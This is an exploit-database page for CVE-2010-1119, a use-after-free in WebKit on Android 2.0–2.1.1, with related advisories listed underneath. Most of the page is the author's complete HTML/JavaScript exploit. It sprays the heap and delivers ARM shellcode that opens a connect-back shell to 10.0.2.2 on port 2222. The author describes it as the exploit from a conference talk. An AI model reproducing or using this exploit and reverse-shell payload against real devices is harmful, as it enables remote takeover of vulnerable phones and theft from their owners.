Lucene search
MJ KeithPACKETSTORM:99300HistoryMar 14, 2011 - 12:00 a.m.
Android 2.0 / 2.1 / 2.1.1 WebKit Use-After-Free
2011-03-1400:00:00
MJ Keith
packetstormsecurity.com
22
0.941 High
EPSS
Percentile
99.0%
`<html>
<!--
# Exploit Title: android exploit for 2010-1119 use after free
# Date: 2011/03/11
# Author: MJ Keith
# Software Link: http://www.android.com/
# Version: 2.0 ,2.1 , 2.1.1
# Tested on: Android
# CVE : 2010-1119
This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
-->
<head>
<script language="JavaScript">
function heap()
{
var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };
var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
shell += unescape("\uae08"); // Port = 2222
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
shell += unescape("\u2000\u2000"); // string terminate
do
{
scode += scode;
scode2 += scode2;
} while (scode.length<=0x1000);
scode2 += shell
target = new Array();
for(i = 0; i < 300; i++){
if (i<130){ target[i] = scode;}
if (i>130){ target[i] = scode2;}
document.write(target[i]);
document.write("<br />");
if (i>250){
// alert("freeze");
nodes[0].textContent}
}
}, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>
`
Related
zdi
zdi
Apple Webkit Attribute Child Removal Remote Code Execution Vulnerability
2010-06-08 00:00:00
android
android
WebKit Use-After-Free
2019-07-03 00:00:00
securityvulns
securityvulns
cve
cve
CVE-2010-1119
2010-03-25 21:00:00
checkpoint_advisories
checkpoint_advisories
Apple Safari Webkit Attribute Child Removal Code Execution (CVE-2010-1119)
2010-07-05 00:00:00
prion
prion
Design/Logic Flaw
2010-03-25 21:00:00
threatpost
threatpost
Apple Plugs 48 Security Holes in Safari Browser
2010-06-08 13:06:29
openvas
openvas
Fedora Update for qt FEDORA-2010-11011
2010-07-16 00:00:00
Fedora Update for qt FEDORA-2010-11011
2010-07-16 00:00:00
Fedora Update for qt FEDORA-2010-11020
2010-07-16 00:00:00
fedora
fedora
[SECURITY] Fedora 13 Update: qt-4.6.3-8.fc13
2010-07-13 07:40:16
[SECURITY] Fedora 12 Update: qt-4.6.3-8.fc12
2010-07-13 07:43:47
nessus
nessus
Apple iTunes < 9.2 Multiple Vulnerabilities (credentialed check)
2010-06-17 00:00:00
iTunes < 9.2 Multiple Vulnerabilities
2010-06-17 00:00:00
Apple iTunes < 9.2 Multiple Vulnerabilities (uncredentialed check)
2010-06-17 00:00:00